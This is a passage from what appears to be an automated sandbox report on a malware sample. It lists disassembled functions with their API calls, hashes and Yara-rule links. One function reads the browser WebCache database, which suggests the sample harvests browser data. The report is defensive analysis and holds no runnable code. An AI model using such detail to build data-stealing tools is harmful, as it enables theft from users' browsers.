                                                                                              • Instruction ID: 125a097a9f26af6413fbc01dcc411eb2579d6a3fd62fad3348166db73649eeaa
                                                                                              • Opcode Fuzzy Hash: b40f1a29007ee88b205eab30251de60a7177f83a5dcce95581a050599bf5dc33
                                                                                              • Instruction Fuzzy Hash: BF018EB294021C75DB207B668C86ECF732CDF45358F1044BEB504E7182D9B88E888AA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040E0AC, Relevance: 7.6, APIs: 5, Instructions: 64windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040E0CE
                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040E0F7
                                                                                              • DeleteObject.GDI32(?), ref: 0040E129
                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,00000000,0040E36A), ref: 0040E171
                                                                                              • LoadIconW.USER32(00000000,00000065), ref: 0040E17A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ??2@$DeleteHandleIconLoadModuleObject
                                                                                              • String ID:
                                                                                              • API String ID: 659443934-0
                                                                                              • Opcode ID: 5c24b57fa0e1cfdf7f3906394f540e2e73f2d4ee2212ac106c4666ba6c8c482e
                                                                                              • Instruction ID: 1cba439d4a63bd06fd13ecdd31e81b6a0d9710d4e5327182bdbee0994cb59d35
                                                                                              • Opcode Fuzzy Hash: 5c24b57fa0e1cfdf7f3906394f540e2e73f2d4ee2212ac106c4666ba6c8c482e
                                                                                              • Instruction Fuzzy Hash: 322193B19012989FDB30EF768C496DEB7A9AF84715F10863BF80CDB241DF794A118B58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0043800C, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 967COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              • only a single result allowed for a SELECT that is part of an expression, xrefs: 004380DE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memset
                                                                                              • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                              • API String ID: 2221118986-1725073988
                                                                                              • Opcode ID: 03496f8306c80886dd27506145db1db38aee062ac88384c6cbfd816796756731
                                                                                              • Instruction ID: 9afff8ac9fdfbc15a9c7ae9a6e2295b57ef319e934304d2411a679509b53bb08
                                                                                              • Opcode Fuzzy Hash: 03496f8306c80886dd27506145db1db38aee062ac88384c6cbfd816796756731
                                                                                              • Instruction Fuzzy Hash: 36826971A00318AFDF25DF69C881AAEBBA1EF08318F14511EFD1597292DB79E841CB94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004050B7, Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00405137: CloseHandle.KERNEL32(000000FF,004050C7,00000000,?,00408B2E,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat,?,?,?,00409013,?,004091EB,000000FF), ref: 0040513F
                                                                                                • Part of subcall function 00407144: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,004421F7,00000000,?,00000000,00000000,00410671,?,?), ref: 00407156
                                                                                              • GetLastError.KERNEL32(00000000,?,00408B2E,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat,?,?,?,00409013,?,004091EB,000000FF,00000000,00000104), ref: 00405124
                                                                                                • Part of subcall function 00407B93: ReadFile.KERNELBASE(?,?,5"D,00000000,00000000,?,?,00442235,00000000,00000000), ref: 00407BAA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$CloseCreateErrorHandleLastRead
                                                                                              • String ID:
                                                                                              • API String ID: 2136311172-0
                                                                                              • Opcode ID: e1fa86938fa3109ce0b7763a12cdd910979c4d4d9c688e98096abe29a5a3520b
                                                                                              • Instruction ID: 849b43cde7c86ee220a2fa92f028283b8c7de21471a02e191cd59f19f3ad1342
                                                                                              • Opcode Fuzzy Hash: e1fa86938fa3109ce0b7763a12cdd910979c4d4d9c688e98096abe29a5a3520b
                                                                                              • Instruction Fuzzy Hash: DD0181B1815A008AD720AB65DC057A776E8DF11319F10893FE5A5EF2C2EB7C94408E6E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00408037, Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • free.MSVCRT(00000000,00408352,00000000,?,00000000), ref: 0040803E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: free
                                                                                              • String ID:
                                                                                              • API String ID: 1294909896-0
                                                                                              • Opcode ID: b8cd1effcdf29b95293438428d1a83d87b736904a3019313e09548ab324a0620
                                                                                              • Instruction ID: b2304b4461d9917b15a132db01dd128865174dbe20628525ae7b4e3248e143f9
                                                                                              • Opcode Fuzzy Hash: b8cd1effcdf29b95293438428d1a83d87b736904a3019313e09548ab324a0620
                                                                                              • Instruction Fuzzy Hash: 17C08CB24107018FF7308F11C905322B3E4AF0073BFA08C0EA0D0914C2DBBCD084CA08
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions